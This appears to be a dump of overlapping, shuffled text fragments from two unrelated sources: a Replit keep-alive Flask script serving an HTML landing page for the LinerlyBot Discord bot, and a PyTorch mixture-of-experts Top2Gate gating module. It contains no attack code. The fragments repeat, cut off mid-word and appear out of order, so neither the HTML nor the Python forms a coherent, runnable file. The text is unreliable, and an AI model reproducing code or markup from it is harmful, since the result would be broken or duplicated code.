"<hr> <h1>Features</h1> <ul> <li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the",
"align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a",
"<code>feeling</code> command.</li> <li>Other miscellaneous such as the <code>quote</code> command.</li> <li>Gold as the currency",
"<code>ping</code>, and the <code>about</code> command.</li> <li>Fun commands such as the <code>joke</code> and the",
"type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head> <body style=\"width: 80%; margin: auto;\"> <style> figure message",
"</style> <p id=\"message\">You're in LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here to go to",
"src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img",
"such as the <code>quote</code> command.</li> <li>Gold as the currency for LinerlyBot.</li> </ul> <hr>",
"Thread from flask import Flask app = Flask(\"\") @app.route(\"/\") def home(): return \"\"\"",
"miscellaneous such as the <code>quote</code> command.</li> <li>Gold as the currency for LinerlyBot.</li> </ul>",
"{ top: 0; left: 0; position: absolute; } </style> <style> #message { margin:",
"as the <code>quote</code> command.</li> <li>Gold as the currency for LinerlyBot.</li> </ul> <hr> </body>",
"Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here to go to LinerlyBot's main page!</a></p> <br> <img",
"#fff; text-align: center; font-family: sans-serif; font-size: 13px; } </style> <p id=\"message\">You're in LinerlyBot's",
"<body style=\"width: 80%; margin: auto;\"> <style> figure message { top: 0; left: 0;",
"#message { margin: 0; padding: 12px 15px; background-color: #1e90ff; color: #fff; text-align: center;",
"href=\"https://linerly.github.io/linerlybot\">Click here to go to LinerlyBot's main page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\"",
"black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new version of",
"50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a",
"<h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a>",
"{ margin: 0; padding: 12px 15px; background-color: #1e90ff; color: #fff; text-align: center; font-family:",
"0; left: 0; position: absolute; } </style> <style> #message { margin: 0; padding:",
"align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code",
"message { top: 0; left: 0; position: absolute; } </style> <style> #message {",
"src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img",
"the <code>joke</code> and the <code>feeling</code> command.</li> <li>Other miscellaneous such as the <code>quote</code> command.</li>",
"<title>LinerlyBot Repl Page</title> </head> <body style=\"width: 80%; margin: auto;\"> <style> figure message {",
"figure message { top: 0; left: 0; position: absolute; } </style> <style> #message",
"command.</li> <li>Gold as the currency for LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\" def",
"src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new version of LinerlyBot",
"src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2>",
"href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new version of LinerlyBot with <a",
"position: absolute; } </style> <style> #message { margin: 0; padding: 12px 15px; background-color:",
"15px; background-color: #1e90ff; color: #fff; text-align: center; font-family: sans-serif; font-size: 13px; } </style>",
"LinerlyBot's main page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right:",
"Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a",
"alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p>",
"Repl Page</title> </head> <body style=\"width: 80%; margin: auto;\"> <style> figure message { top:",
"as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li> <li>Fun commands such as",
"from threading import Thread from flask import Flask app = Flask(\"\") @app.route(\"/\") def",
"commands such as the <code>joke</code> and the <code>feeling</code> command.</li> <li>Other miscellaneous such as",
"margin-left: auto; margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a",
"<hr> </body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\", port=8080) def keep_alive(): t = Thread(target=run)",
"isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a",
"src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such as the <code>help</code>, <code>info</code>,",
"<!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head> <body style=\"width:",
"as the <code>joke</code> and the <code>feeling</code> command.</li> <li>Other miscellaneous such as the <code>quote</code>",
"and the <code>about</code> command.</li> <li>Fun commands such as the <code>joke</code> and the <code>feeling</code>",
"<li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li> <li>Fun",
"12px 15px; background-color: #1e90ff; color: #fff; text-align: center; font-family: sans-serif; font-size: 13px; }",
"<ul> <li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li>",
"LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational",
"from flask import Flask app = Flask(\"\") @app.route(\"/\") def home(): return \"\"\" <!DOCTYPE=\"html\">",
"return \"\"\" <!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head>",
"padding: 12px 15px; background-color: #1e90ff; color: #fff; text-align: center; font-family: sans-serif; font-size: 13px;",
"<p id=\"message\">You're in LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here to go to LinerlyBot's",
"13px; } </style> <p id=\"message\">You're in LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here to",
"href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such as",
"<head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head> <body style=\"width: 80%; margin:",
"<code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li> <li>Fun commands such as the <code>joke</code>",
"threading import Thread from flask import Flask app = Flask(\"\") @app.route(\"/\") def home():",
"</style> <style> #message { margin: 0; padding: 12px 15px; background-color: #1e90ff; color: #fff;",
"} </style> <p id=\"message\">You're in LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here to go",
"<p>The new version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p>",
"<h1>Features</h1> <ul> <li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code>",
"src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p>",
"page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right: auto; border-radius:",
"border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a>",
"import Thread from flask import Flask app = Flask(\"\") @app.route(\"/\") def home(): return",
"version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1>",
"auto; margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img",
"<a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such",
"currency for LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\", port=8080) def"
] |
[
"locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 #",
"super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor,",
"+ gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s",
"# This source code is licensed under the BSD license found in the",
"location by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) #",
"gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc =",
"# gates has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] #",
"torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux,",
"source code is licensed under the BSD license found in the # LICENSE",
"= torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s",
"torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type:",
"has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity =",
"in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from",
"gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero =",
"torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s",
"int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor)",
"= 2S/E capacity = 2 * num_tokens // num_experts assert num_tokens % num_experts",
"file in the root directory of this source tree. # Implementation of Top2Gating",
"reserved. # # This source code is licensed under the BSD license found",
"size of model embedding dimension num_experts (ints): number of experts in model \"\"\"",
"torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def",
"shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E",
"dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations",
"Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int):",
"dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float =",
"// num_experts assert num_tokens % num_experts == 0 # Create a mask for",
"BSD license found in the # LICENSE file in the root directory of",
"capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) -",
"buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1",
"import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device:",
"expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create",
"Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from",
"(ints): number of experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int,",
"-> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) #",
"gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel",
"implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights,",
"gates = F.softmax(logits, dim=1) # gates has shape of SE num_tokens = gates.shape[0]",
"the # LICENSE file in the root directory of this source tree. #",
"bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits",
"num_tokens // num_experts assert num_tokens % num_experts == 0 # Create a mask",
"mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s =",
"of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo:",
"mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s =",
"https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing",
"gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask",
"capacity = 2 * num_tokens // num_experts assert num_tokens % num_experts == 0",
"1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) #",
"https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value",
"in the # LICENSE file in the root directory of this source tree.",
"/= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2",
"mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid",
"a mask for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise",
"of experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,)",
"torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s =",
"Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero",
"is licensed under the BSD license found in the # LICENSE file in",
"2S/E capacity = 2 * num_tokens // num_experts assert num_tokens % num_experts ==",
"F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) -",
"Args: model_dim (int): size of model embedding dimension num_experts (ints): number of experts",
"from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the",
"number of experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts:",
"input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits = self.wg(input) return",
"the capacity location for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s",
"combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which",
"Dict, Tuple import torch from torch import Tensor import torch.nn.functional as F gumbel_map:",
"# Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\",",
"gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s,",
"dim=0) - 1 # Update 2nd's location by accounting for locations of 1st",
"def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts,",
"# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. # #",
"combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model",
"torch.mean(me * ce) # Remove locations outside capacity from mask mask1 *= torch.lt(locations1,",
"Facebook, Inc. and its affiliates. All rights reserved. # # This source code",
"experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) ->",
"= F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc)",
"dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements",
"min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s,",
"Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2,",
"gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /=",
"int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self,",
"in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0)",
"num_tokens % num_experts == 0 # Create a mask for 1st's expert per",
"tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by",
"l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of",
"# Update 2nd's location by accounting for locations of 1st locations2 += torch.sum(mask1,",
"torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc",
"locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc)",
"num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore",
"def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is",
"top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits,",
"num_classes=num_experts) # Create a mask for 2nd's expert per token using Gumbel-max trick",
"gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero",
"= torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s +",
"= gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity = 2 *",
"*= torch.lt(locations2, capacity) # Store the capacity location for each token locations1_s =",
"dim=0) l_aux = torch.mean(me * ce) # Remove locations outside capacity from mask",
"Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates",
"0 # Create a mask for 1st's expert per token indices1_s = torch.argmax(gates,",
"a mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 =",
"for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me",
"top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2",
"Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in Gshard_. :: gate =",
"logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape of SE num_tokens =",
"capacity = 2S/E capacity = 2 * num_tokens // num_experts assert num_tokens %",
"num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size",
"dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location",
"capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store",
"dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per",
"location for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2",
"% num_experts == 0 # Create a mask for 1st's expert per token",
"Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape of SE",
"All rights reserved. # # This source code is licensed under the BSD",
"in the root directory of this source tree. # Implementation of Top2Gating described",
"= Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim",
"torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's",
"import torch from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable]",
"outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) #",
"module which implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts)",
"Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel =",
"which implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux,",
"2 * num_tokens // num_experts assert num_tokens % num_experts == 0 # Create",
"torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim,",
"gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s #",
"Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device)",
"gates has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity",
"+ combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module",
"gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates",
"Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_:",
"F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights",
"# LICENSE file in the root directory of this source tree. # Implementation",
"of this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code",
"def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits =",
"is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict,",
"torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor)",
"mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1,",
"gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts",
"capacity) # Store the capacity location for each token locations1_s = torch.sum(locations1 *",
"me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce)",
"affiliates. All rights reserved. # # This source code is licensed under the",
"Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me",
"torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1",
"= torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer",
"divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate",
"Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert",
"device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one =",
"locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me =",
"and its affiliates. All rights reserved. # # This source code is licensed",
"l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in",
"= torch.mean(me * ce) # Remove locations outside capacity from mask mask1 *=",
